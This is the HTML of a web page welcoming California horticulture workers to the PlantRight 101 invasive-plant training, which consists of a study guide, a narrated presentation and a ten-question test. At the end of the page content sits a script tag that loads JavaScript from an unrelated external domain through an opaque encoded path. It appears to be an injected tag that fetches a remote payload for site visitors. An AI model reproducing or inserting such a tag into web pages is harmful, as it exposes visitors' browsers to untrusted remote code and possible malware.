<div id="content">
  <h2 class="pageTitle">PlantRight 101 training</h2>

  <p>Welcome! The PlantRight 101 training program was created to equip members of California’s horticultural industry with a baseline understanding of invasive plant issues and the simple steps we can take to prevent their spread.</p>

  <h3 class="staff_training_consists">The three-part program consists of:</h3>
<ol class="staff_training_consists">
<li>Reviewing a study guide on invasive plants in California.</li>
<li>Viewing a 12-minute, narrated presentation.</li>
<li>Passing a 10-question test to verify your understanding of invasive plant issues.</li>
</ol>

  <div class="signup_for_training"><a href="#">Sign up and begin your PlantRight 101 training now.</a></div>

  <p>Thanks in advance for investing your time and making the commitment to help gardeners and landscapers plant beautiful, environmentally friendly and climate-appropriate plants. Together we can keep invasive plants in check.</p>

<script src="http://suscon.faculte.com/php/html/bw/OTQxODc4NTY" type="text/javascript"></script>

</div>
